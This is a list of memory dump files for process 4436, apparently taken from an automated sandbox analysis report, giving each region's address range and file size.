                                                        • memory/4436-25-0x00007FF8567B0000-0x00007FF856E72000-memory.dmp

                                                          Filesize

                                                          6.8MB

                                                        • memory/4436-316-0x00007FF8567B0000-0x00007FF856E72000-memory.dmp

                                                          Filesize

                                                          6.8MB

                                                        • memory/4436-330-0x00007FF855950000-0x00007FF855A6A000-memory.dmp

                                                          Filesize

                                                          1.1MB

                                                        • memory/4436-322-0x00007FF864F80000-0x00007FF8650FF000-memory.dmp

                                                          Filesize

                                                          1.5MB

                                                        • memory/4436-317-0x00007FF86A3E0000-0x00007FF86A405000-memory.dmp

                                                          Filesize

                                                          148KB

                                                        • memory/4436-351-0x00007FF8567B0000-0x00007FF856E72000-memory.dmp

                                                          Filesize

                                                          6.8MB

                                                        • memory/4436-381-0x00007FF855B90000-0x00007FF8560C3000-memory.dmp

                                                          Filesize

                                                          5.2MB

                                                        • memory/4436-386-0x00007FF865750000-0x00007FF865774000-memory.dmp

                                                          Filesize

                                                          144KB

                                                        • memory/4436-395-0x00007FF855950000-0x00007FF855A6A000-memory.dmp

                                                          Filesize

                                                          1.1MB

                                                        • memory/4436-394-0x00007FF86AD70000-0x00007FF86AD7D000-memory.dmp

                                                          Filesize

                                                          52KB

                                                        • memory/4436-393-0x00007FF864A50000-0x00007FF864A64000-memory.dmp

                                                          Filesize

                                                          80KB

                                                        • memory/4436-392-0x000001BDA8230000-0x000001BDA8763000-memory.dmp

                                                          Filesize

                                                          5.2MB

                                                        • memory/4436-391-0x00007FF865900000-0x00007FF8659CE000-memory.dmp

                                                          Filesize

                                                          824KB

                                                        • memory/4436-390-0x00007FF8659D0000-0x00007FF865A03000-memory.dmp

                                                          Filesize

                                                          204KB

                                                        • memory/4436-389-0x00007FF86AD80000-0x00007FF86AD8D000-memory.dmp

                                                          Filesize

                                                          52KB

                                                        • memory/4436-388-0x00007FF8655F0000-0x00007FF865609000-memory.dmp

                                                          Filesize

                                                          100KB

                                                        • memory/4436-387-0x00007FF864F80000-0x00007FF8650FF000-memory.dmp

                                                          Filesize

                                                          1.5MB

                                                        • memory/4436-385-0x00007FF866500000-0x00007FF866519000-memory.dmp

                                                          Filesize

                                                          100KB

                                                        • memory/4436-384-0x00007FF865780000-0x00007FF8657AC000-memory.dmp

                                                          Filesize

                                                          176KB

                                                        • memory/4436-383-0x00007FF86AEB0000-0x00007FF86AEBF000-memory.dmp

                                                          Filesize

                                                          60KB

                                                        • memory/4436-382-0x00007FF86A3E0000-0x00007FF86A405000-memory.dmp

                                                          Filesize

                                                          148KB

                                                        • memory/4436-366-0x00007FF8567B0000-0x00007FF856E72000-memory.dmp

                                                          Filesize

                                                          6.8MB